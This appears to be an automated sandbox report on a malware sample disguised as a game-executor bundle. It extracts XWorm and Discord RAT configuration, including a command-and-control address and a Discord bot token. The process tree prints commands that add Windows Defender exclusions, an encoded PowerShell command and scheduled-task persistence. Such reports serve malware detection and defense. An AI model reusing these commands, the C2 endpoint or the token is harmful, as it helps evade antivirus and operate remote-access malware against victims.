Overview
overview
10Static
static
7RoseBETA2/...re.dll
windows7-x64
1RoseBETA2/...re.dll
windows10-2004-x64
1RoseBETA2/...re.dll
windows7-x64
1RoseBETA2/...re.dll
windows10-2004-x64
1RoseBETA2/...ss.exe
windows7-x64
1RoseBETA2/...ss.exe
windows10-2004-x64
1RoseBETA2/...ime.js
windows7-x64
3RoseBETA2/...ime.js
windows10-2004-x64
3RoseBETA2/...or.exe
windows7-x64
9RoseBETA2/...or.exe
windows10-2004-x64
9RoseBETA2/Rose.dll
windows7-x64
8RoseBETA2/Rose.dll
windows10-2004-x64
8RoseBETA2/Rose.exe
windows7-x64
10RoseBETA2/Rose.exe
windows10-2004-x64
10RoseBETA2/...6e2.js
windows7-x64
3RoseBETA2/...6e2.js
windows10-2004-x64
3RoseBETA2/...x.html
windows7-x64
1RoseBETA2/...x.html
windows10-2004-x64
1RoseBETA2/...au.exe
windows7-x64
1RoseBETA2/...au.exe
windows10-2004-x64
1RoseBETA2/...au.exe
windows7-x64
1RoseBETA2/...au.exe
windows10-2004-x64
1Analysis
-
max time kernel
148s -
max time network
155s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
21-05-2024 17:55
Behavioral task
behavioral1
Sample
RoseBETA2/Azure.Core.dll
Resource
win7-20240215-en
Behavioral task
behavioral2
Sample
RoseBETA2/Azure.Core.dll
Resource
win10v2004-20240508-en
Behavioral task
behavioral3
Sample
RoseBETA2/CefSharp.BrowserSubprocess.Core.dll
Resource
win7-20240220-en
Behavioral task
behavioral4
Sample
RoseBETA2/CefSharp.BrowserSubprocess.Core.dll
Resource
win10v2004-20240508-en
Behavioral task
behavioral5
Sample
RoseBETA2/CefSharp.BrowserSubprocess.exe
Resource
win7-20231129-en
Behavioral task
behavioral6
Sample
RoseBETA2/CefSharp.BrowserSubprocess.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral7
Sample
RoseBETA2/CefSharp.Core.Runtime.js
Resource
win7-20240221-en
Behavioral task
behavioral8
Sample
RoseBETA2/CefSharp.Core.Runtime.js
Resource
win10v2004-20240426-en
Behavioral task
behavioral9
Sample
RoseBETA2/Injector.exe
Resource
win7-20240508-en
Behavioral task
behavioral10
Sample
RoseBETA2/Injector.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral11
Sample
RoseBETA2/Rose.dll
Resource
win7-20231129-en
Behavioral task
behavioral12
Sample
RoseBETA2/Rose.dll
Resource
win10v2004-20240426-en
Behavioral task
behavioral13
Sample
RoseBETA2/Rose.exe
Resource
win7-20240221-en
Behavioral task
behavioral14
Sample
RoseBETA2/Rose.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral15
Sample
RoseBETA2/dist/client/assets/apex-421346e2.js
Resource
win7-20240220-en
Behavioral task
behavioral16
Sample
RoseBETA2/dist/client/assets/apex-421346e2.js
Resource
win10v2004-20240508-en
Behavioral task
behavioral17
Sample
RoseBETA2/dist/client/index.html
Resource
win7-20240221-en
Behavioral task
behavioral18
Sample
RoseBETA2/dist/client/index.html
Resource
win10v2004-20240508-en
Behavioral task
behavioral19
Sample
RoseBETA2/dist/shared/Rose-luau.exe
Resource
win7-20240221-en
Behavioral task
behavioral20
Sample
RoseBETA2/dist/shared/Rose-luau.exe
Resource
win10v2004-20240426-en
Behavioral task
behavioral21
Sample
RoseBETA2/dist/shared/bin/Rose-luau.exe
Resource
win7-20240419-en
Behavioral task
behavioral22
Sample
RoseBETA2/dist/shared/bin/Rose-luau.exe
Resource
win10v2004-20240508-en
General
-
Target
RoseBETA2/Rose.exe
-
Size
7.1MB
-
MD5
e3a5864bd287c04b45c643e12b4ed47f
-
SHA1
9ab0757a2cf6f8470d748ab353b3f1bdd4c8f4e5
-
SHA256
e3a6cc03b47e76ff8b453136726a443c72b6f15ea146559bde34e11fb86fe9c6
-
SHA512
fb3717826e0fd4c5b1e6cb276c041752a686aa921a702e35431a8511b3a1496c91e723aaf153d696fe62a984c9c780f04aae5bfc6b586b099f586c06ab59ab7b
-
SSDEEP
196608:3z72FcW+16K2VMf/89/jGCtw9kx6Vro3Kv06u:3As69+/89/jP+kE8l
Malware Config
Extracted
xworm
3.125.209.94:13551
-
Install_directory
%AppData%
-
install_file
Roaming5.exe
Extracted
discordrat
-
discord_token
MTIzODIyMjM1NTkxNDk0ODYxOA.GIhaBv.jW6xqCJH4cBG7Z95TuFbhmiRz3U2zCK9bD4ZH0
-
server_id
1237864378947207299
Signatures
-
Detect Xworm Payload 3 IoCs
resource yara_rule behavioral13/files/0x000c00000001432c-4.dat family_xworm behavioral13/memory/2636-64-0x0000000000E90000-0x0000000000EAC000-memory.dmp family_xworm behavioral13/memory/2464-186-0x0000000001140000-0x000000000115C000-memory.dmp family_xworm -
Discord RAT
A RAT written in C# using Discord as a C2.
-
pid Process 2096 powershell.exe 844 powershell.exe 2104 powershell.exe 2856 powershell.exe 952 powershell.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Roaming5.lnk XClient - Copy (2).exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Roaming5.lnk XClient - Copy (2).exe -
Executes dropped EXE 6 IoCs
pid Process 2636 XClient - Copy (2).exe 2556 Built.exe 2684 Client-built.exe 2940 Built.exe 2464 Roaming5.exe 2428 Roaming5.exe -
Loads dropped DLL 15 IoCs
pid Process 1696 Rose.exe 1696 Rose.exe 2940 Built.exe 2940 Built.exe 2940 Built.exe 2940 Built.exe 2940 Built.exe 2940 Built.exe 2940 Built.exe 1488 WerFault.exe 1488 WerFault.exe 1488 WerFault.exe 1488 WerFault.exe 1488 WerFault.exe 1192 Process not Found -
resource yara_rule behavioral13/files/0x003500000001459f-94.dat upx behavioral13/memory/2940-96-0x000007FEF1C50000-0x000007FEF20BE000-memory.dmp upx -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\Roaming5 = "C:\\Users\\Admin\\AppData\\Roaming\\Roaming5.exe" XClient - Copy (2).exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 4 ip-api.com -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\XClient - Copy (2).exe Rose.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1880 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2636 XClient - Copy (2).exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2096 powershell.exe 844 powershell.exe 2104 powershell.exe 2856 powershell.exe 952 powershell.exe 2636 XClient - Copy (2).exe -
Suspicious use of AdjustPrivilegeToken 9 IoCs
description pid Process Token: SeDebugPrivilege 2636 XClient - Copy (2).exe Token: SeDebugPrivilege 2096 powershell.exe Token: SeDebugPrivilege 844 powershell.exe Token: SeDebugPrivilege 2104 powershell.exe Token: SeDebugPrivilege 2856 powershell.exe Token: SeDebugPrivilege 952 powershell.exe Token: SeDebugPrivilege 2636 XClient - Copy (2).exe Token: SeDebugPrivilege 2464 Roaming5.exe Token: SeDebugPrivilege 2428 Roaming5.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2636 XClient - Copy (2).exe -
Suspicious use of WriteProcessMemory 43 IoCs
description pid Process procid_target PID 1696 wrote to memory of 2096 1696 Rose.exe 28 PID 1696 wrote to memory of 2096 1696 Rose.exe 28 PID 1696 wrote to memory of 2096 1696 Rose.exe 28 PID 1696 wrote to memory of 2096 1696 Rose.exe 28 PID 1696 wrote to memory of 2636 1696 Rose.exe 30 PID 1696 wrote to memory of 2636 1696 Rose.exe 30 PID 1696 wrote to memory of 2636 1696 Rose.exe 30 PID 1696 wrote to memory of 2636 1696 Rose.exe 30 PID 1696 wrote to memory of 2556 1696 Rose.exe 31 PID 1696 wrote to memory of 2556 1696 Rose.exe 31 PID 1696 wrote to memory of 2556 1696 Rose.exe 31 PID 1696 wrote to memory of 2556 1696 Rose.exe 31 PID 1696 wrote to memory of 2684 1696 Rose.exe 32 PID 1696 wrote to memory of 2684 1696 Rose.exe 32 PID 1696 wrote to memory of 2684 1696 Rose.exe 32 PID 1696 wrote to memory of 2684 1696 Rose.exe 32 PID 2556 wrote to memory of 2940 2556 Built.exe 33 PID 2556 wrote to memory of 2940 2556 Built.exe 33 PID 2556 wrote to memory of 2940 2556 Built.exe 33 PID 2684 wrote to memory of 1488 2684 Client-built.exe 34 PID 2684 wrote to memory of 1488 2684 Client-built.exe 34 PID 2684 wrote to memory of 1488 2684 Client-built.exe 34 PID 2636 wrote to memory of 844 2636 XClient - Copy (2).exe 36 PID 2636 wrote to memory of 844 2636 XClient - Copy (2).exe 36 PID 2636 wrote to memory of 844 2636 XClient - Copy (2).exe 36 PID 2636 wrote to memory of 2104 2636 XClient - Copy (2).exe 38 PID 2636 wrote to memory of 2104 2636 XClient - Copy (2).exe 38 PID 2636 wrote to memory of 2104 2636 XClient - Copy (2).exe 38 PID 2636 wrote to memory of 2856 2636 XClient - Copy (2).exe 40 PID 2636 wrote to memory of 2856 2636 XClient - Copy (2).exe 40 PID 2636 wrote to memory of 2856 2636 XClient - Copy (2).exe 40 PID 2636 wrote to memory of 952 2636 XClient - Copy (2).exe 42 PID 2636 wrote to memory of 952 2636 XClient - Copy (2).exe 42 PID 2636 wrote to memory of 952 2636 XClient - Copy (2).exe 42 PID 2636 wrote to memory of 1880 2636 XClient - Copy (2).exe 44 PID 2636 wrote to memory of 1880 2636 XClient - Copy (2).exe 44 PID 2636 wrote to memory of 1880 2636 XClient - Copy (2).exe 44 PID 2608 wrote to memory of 2464 2608 taskeng.exe 49 PID 2608 wrote to memory of 2464 2608 taskeng.exe 49 PID 2608 wrote to memory of 2464 2608 taskeng.exe 49 PID 2608 wrote to memory of 2428 2608 taskeng.exe 50 PID 2608 wrote to memory of 2428 2608 taskeng.exe 50 PID 2608 wrote to memory of 2428 2608 taskeng.exe 50 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\RoseBETA2\Rose.exe"C:\Users\Admin\AppData\Local\Temp\RoseBETA2\Rose.exe"1⤵
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:1696 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAYQBzACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AZABxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAcABqACMAPgA="2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2096
-
-
C:\Windows\XClient - Copy (2).exe"C:\Windows\XClient - Copy (2).exe"2⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2636 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\XClient - Copy (2).exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:844
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient - Copy (2).exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2104
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Roaming5.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2856
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Roaming5.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:952
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Roaming5" /tr "C:\Users\Admin\AppData\Roaming\Roaming5.exe"3⤵
- Creates scheduled task(s)
PID:1880
-
-
-
C:\Users\Admin\AppData\Local\Built.exe"C:\Users\Admin\AppData\Local\Built.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2556 -
C:\Users\Admin\AppData\Local\Built.exe"C:\Users\Admin\AppData\Local\Built.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2940
-
-
-
C:\Users\Admin\Client-built.exe"C:\Users\Admin\Client-built.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2684 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2684 -s 6003⤵
- Loads dropped DLL
PID:1488
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {78309538-8148-4425-A4F3-A15F4B5E5281} S-1-5-21-1298544033-3225604241-2703760938-1000:IZKCKOTP\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
PID:2608 -
C:\Users\Admin\AppData\Roaming\Roaming5.exeC:\Users\Admin\AppData\Roaming\Roaming5.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2464
-
-
C:\Users\Admin\AppData\Roaming\Roaming5.exeC:\Users\Admin\AppData\Roaming\Roaming5.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2428
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
21KB
MD5bcb8b9f6606d4094270b6d9b2ed92139
SHA1bd55e985db649eadcb444857beed397362a2ba7b
SHA256fa18d63a117153e2ace5400ed89b0806e96f0627d9db935906be9294a3038118
SHA512869b2b38fd528b033b3ec17a4144d818e42242b83d7be48e2e6da6992111758b302f48f52e0dd76becb526a90a2b040ce143c6d4f0e009a513017f06b9a8f2b9
-
Filesize
18KB
MD5bfffa7117fd9b1622c66d949bac3f1d7
SHA1402b7b8f8dcfd321b1d12fc85a1ee5137a5569b2
SHA2561ea267a2e6284f17dd548c6f2285e19f7edb15d6e737a55391140ce5cb95225e
SHA512b319cc7b436b1be165cdf6ffcab8a87fe29de78f7e0b14c8f562be160481fb5483289bd5956fdc1d8660da7a3f86d8eede35c6cc2b7c3d4c852decf4b2dcdb7f
-
Filesize
21KB
MD520ddf543a1abe7aee845de1ec1d3aa8e
SHA10eaf5de57369e1db7f275a2fffd2d2c9e5af65bf
SHA256d045a72c3e4d21165e9372f76b44ff116446c1e0c221d9cea3ab0a1134a310e8
SHA51296dd48df315a7eea280ca3da0965a937a649ee77a82a1049e3d09b234439f7d927d7fb749073d7af1b23dadb643978b70dcdadc6c503fe850b512b0c9c1c78dd
-
Filesize
21KB
MD54380d56a3b83ca19ea269747c9b8302b
SHA10c4427f6f0f367d180d37fc10ecbe6534ef6469c
SHA256a79c7f86462d8ab8a7b73a3f9e469514f57f9fe456326be3727352b092b6b14a
SHA5121c29c335c55f5f896526c8ee0f7160211fd457c1f1b98915bcc141112f8a730e1a92391ab96688cbb7287e81e6814cc86e3b057e0a6129cbb02892108bfafaf4
-
Filesize
21KB
MD52554060f26e548a089cab427990aacdf
SHA18cc7a44a16d6b0a6b7ed444e68990ff296d712fe
SHA2565ab003e899270b04abc7f67be953eaccf980d5bbe80904c47f9aaf5d401bb044
SHA512fd4d5a7fe4da77b0222b040dc38e53f48f7a3379f69e2199639b9f330b2e55939d89ce8361d2135182b607ad75e58ee8e34b90225143927b15dcc116b994c506
-
Filesize
1.4MB
MD5178a0f45fde7db40c238f1340a0c0ec0
SHA1dcd2d3d14e06da3e8d7dc91a69b5fd785768b5fe
SHA2569fcb5ad15bd33dd72122a171a5d950e8e47ceda09372f25df828010cde24b8ed
SHA5124b790046787e57b9414a796838a026b1530f497a75c8e62d62b56f8c16a0cbedbefad3d4be957bc18379f64374d8d3bf62d3c64b53476c7c5005a7355acd2cee
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KDBRJONWQTQLJI25HT6Y.temp
Filesize7KB
MD5009d630c3933ce47b86a3c2f538d26d9
SHA1f5921bc9d7b6e1d683705028db0d90dc4ea86b37
SHA25665a282c1aac69721ba176c9fcb81d9f8c993ff65219f24fe86542ac326477e31
SHA51284ef21efe45f6f7ecd1e54f09582d4d4aa776ca5328ab5e3a104636c84a976140fbf0bb2a6dfb3fc053913fc4a0042ca345596bb8deaf09cf05d5e1409a2f17b
-
Filesize
78KB
MD5772f55ff66b453cb13c22bab187923f8
SHA1babcadea40b03526c4012e876a46e73e4cd99823
SHA256e0e48ac39bd7ace97549ebfb470936c058ee42b935ecee31b6e907e5845676c4
SHA5121da7e00cb8608507014f377617e67aef798df512698fe96aa94bb8c5c9ad559122c833c73b0b350d0f4c40c0bb821740c5a04dd00b3a39c57e3bbe6fb3b83f6b
-
Filesize
84KB
MD51a2bc2920343306bacef613b499d238d
SHA126f3caa75790e6479eda5b0e2790c22f3e0e5090
SHA256621d16d9de023d962f59efed9dd6d4234e3e667c824ea248b0de354a2bd2bf0b
SHA512868a1f58992be96440c5e36cecf117b2aef9a950e8f051bb0c7209e3697d00b7339730ed1bc565a97260109888f3d8079d5928508b700c3574945088b3df4215
-
Filesize
6.7MB
MD505b323f8cca7150d1c99447d32f3fdf8
SHA11cab9ce03a658637419287dbe59abdf796d012c6
SHA256612d272a6109b628fd07d5c07a2e9338d4a8f31b3c21241d947e68c6e69c60dd
SHA51200da24f807f42009cf2016614ed7657464157aacb58399bf0376ccf70ca0afb1cfaa25f74cb28e9c471b796f8e3a555000971a67700193e0c4b9ffc863077d42
-
Filesize
992KB
MD50e0bac3d1dcc1833eae4e3e4cf83c4ef
SHA14189f4459c54e69c6d3155a82524bda7549a75a6
SHA2568a91052ef261b5fbf3223ae9ce789af73dfe1e9b0ba5bdbc4d564870a24f2bae
SHA512a45946e3971816f66dd7ea3788aacc384a9e95011500b458212dc104741315b85659e0d56a41570731d338bdf182141c093d3ced222c007038583ceb808e26fd